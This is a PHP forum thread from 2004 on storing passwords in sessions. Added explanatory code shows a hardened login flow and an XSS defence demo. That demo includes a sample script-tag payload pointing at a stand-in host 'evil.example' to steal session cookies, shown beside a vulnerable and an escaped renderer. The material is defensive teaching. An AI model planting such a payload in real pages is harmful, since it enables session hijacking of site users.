Should you store password in session?
Posted: Sun Nov 21, 2004 11:48 pm
by bradles
Hi All,
Is it a bad idea to store a user's md5 password in a session? Can we get by without it being in there?
Sorry... I'm fairly new to writing a login script.
Brad.
Posted: Mon Nov 22, 2004 3:25 am
by rehfeld
It's not that bad. It really depends how safe you need to be. If it's md5'ed it's pretty safe though. Your weak points are likely in other places.
But it would probably be better to just use something like:
```php
<?php
session_start(); // the session must be started before $_SESSION is read or written

// on the login page; credentials_are_valid() stands in for your own username/password check
if (credentials_are_valid($username, $password)) {
    $_SESSION['logged_in'] = true;
}

// then just check on subsequent pages
if (empty($_SESSION['logged_in'])) {
    echo 'not logged in';
} else {
    // ok
}
```
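The flag-in-session approach above, carried through as a complete login flow. This is an added example, not rehfeld's code or anything from the original thread: the `$users` array, the account in it, and the function names `login()`, `require_login()` and `logout()` are this example's own assumptions. It uses `password_hash()`/`password_verify()` (PHP 5.5+) in place of the md5 the thread talks about, and regenerates the session id on login so a session id handed to the victim before login cannot be reused afterwards.

```php
<?php
// Added example, not from the original thread. Shows a login that keeps the
// password and its hash out of $_SESSION entirely: only "who" and "logged in"
// are stored. Function names and the sample account are constructed.

session_start();

// Constructed stand-in for a users table: username => stored password hash.
// In a real app this row comes from the database, hashed at registration time.
$users = [
    'brad' => password_hash('correct horse battery staple', PASSWORD_DEFAULT),
];

function login(array $users, string $username, string $password): bool
{
    // password_verify() reads the salt and algorithm out of the stored hash and
    // compares in constant time, so no manual md5()/== comparison is needed.
    if (!isset($users[$username]) || !password_verify($password, $users[$username])) {
        return false;
    }

    // Discard the pre-login session id (session fixation defence) and delete
    // the old server-side file so the old id is not usable.
    session_regenerate_id(true);

    // Store only what later pages need. Deliberately NOT stored: $password,
    // the hash, or anything that could be replayed against the login form.
    $_SESSION['logged_in'] = true;
    $_SESSION['user']      = $username;
    return true;
}

// Call at the top of every protected page; returns the username or stops the request.
function require_login(): string
{
    if (empty($_SESSION['logged_in']) || empty($_SESSION['user'])) {
        http_response_code(403);
        exit('not logged in');
    }
    return $_SESSION['user'];
}

function logout(): void
{
    $_SESSION = [];
    // Expire the cookie as well as destroying the server-side data, otherwise
    // the browser keeps presenting the old id.
    if (ini_get('session.use_cookies')) {
        $p = session_get_cookie_params();
        setcookie(session_name(), '', time() - 42000,
            $p['path'], $p['domain'], $p['secure'], $p['httponly']);
    }
    session_destroy();
}

// Usage, e.g. in login.php handling the form POST:
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $ok = login($users, $_POST['username'] ?? '', $_POST['password'] ?? '');
    echo $ok ? 'welcome' : 'bad credentials';
}
```

The point of `session_regenerate_id(true)` is that a session id is only as trustworthy as the moment it was issued: anything the user (or an attacker) held before authentication should not become an authenticated session. Storing the username rather than the hash also means a leaked session file or a hijacked session yields a logged-in session but not a credential that works elsewhere.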
Posted: Mon Nov 22, 2004 6:36 am
by bradles
Thanks rehfeld. Much appreciated.
Posted: Mon Nov 22, 2004 6:43 am
by John Cartwright
bradles wrote:Thanks rehfeld. Much appreciated.
To answer your question, I would recommend you do not. MD5 hashes can be broken, and sessions can be hijacked. If someone REALLY wanted to, with a bit of research it could be accomplished.
Posted: Mon Nov 22, 2004 7:46 am
by Maugrim_The_Reaper
As above - password in session is risky. It's low risk, but it's there all the same.
I'd be far more worried about having a user's session hijacked. This is entirely possible using XSS (cross-site scripting). You can look it up in more detail by googling, but it boils down to ensuring users cannot employ JavaScript, etc. in any text they submit - for example, setting something simple like an MSN contact detail to point to a JS file using script tags which steals some user cookie details - like the sessid...
Something to think about...
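The attack Maugrim describes, and the two defences a practitioner would want, as an added example that is not part of the original thread. The payload string, the `evil.example` URL and the `render_contact_*` function names are constructed for this example; the array form of `session_set_cookie_params()` needs PHP 7.3+, and `'secure' => true` assumes the site is served over HTTPS.

```php
<?php
// Added example, not code from the original thread. A profile field containing
// a <script> tag is echoed back to other users (the XSS Maugrim describes);
// the fix is to HTML-encode user text on output. Marking the session cookie
// HttpOnly is the second layer: an injected script cannot read the id from
// document.cookie. Payload, URL and function names are constructed.

// Cookie hardening must be set before session_start() sends the cookie.
session_set_cookie_params([
    'httponly' => true,   // not exposed to document.cookie
    'secure'   => true,   // assumption: site runs over HTTPS
    'samesite' => 'Lax',  // cookie not sent on cross-site POSTs
]);
session_start();

// Constructed example of what an attacker might save as their "MSN contact".
$contact = '<script src="http://evil.example/steal.js"></script>';

// VULNERABLE: the stored value is dropped straight into the page, so the
// browser of every viewer loads and runs the attacker's script with that
// viewer's cookies and session.
function render_contact_unsafe(string $contact): string
{
    return "<p>MSN: $contact</p>";
}

// FIXED: encode for the HTML context the value lands in. <, >, ", ' and &
// become entities, so the browser renders them as text rather than markup.
function render_contact_safe(string $contact): string
{
    return '<p>MSN: ' . htmlspecialchars($contact, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</p>';
}

echo render_contact_unsafe($contact), PHP_EOL;
echo render_contact_safe($contact), PHP_EOL;

// Sanity check: the safe rendering contains no live tag.
var_dump(strpos(render_contact_safe($contact), '<script') === false);
```

Two caveats. Encoding is per context: `htmlspecialchars()` is right for text and attribute values in HTML, but a value placed inside a `<script>` block or a URL needs that context's own encoding. And HttpOnly only stops the script from reading the cookie; a script that is already running can still issue requests that carry it, so it narrows the damage (no exfiltrated session id to reuse later) rather than removing the need to escape output.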
Posted: Mon Nov 22, 2004 7:47 am
by John Cartwright
Maugrim_The_Reaper wrote:As above - password in session is risky. It's low risk, but it's there all the same.
I'd be far more worried about having a user's session hijacked. This is entirely possible using XSS (cross-site scripting). You can look it up in more detail by googling, but it boils down to ensuring users cannot employ JavaScript, etc. in any text they submit - for example, setting something simple like an MSN contact detail to point to a JS file using script tags which steals some user cookie details - like the sessid...
Something to think about...
hehe, nice idea lol
Posted: Mon Nov 22, 2004 10:18 am
by Maugrim_The_Reaper
It's not so funny when it happens to you...

I've seen it in action on a test case.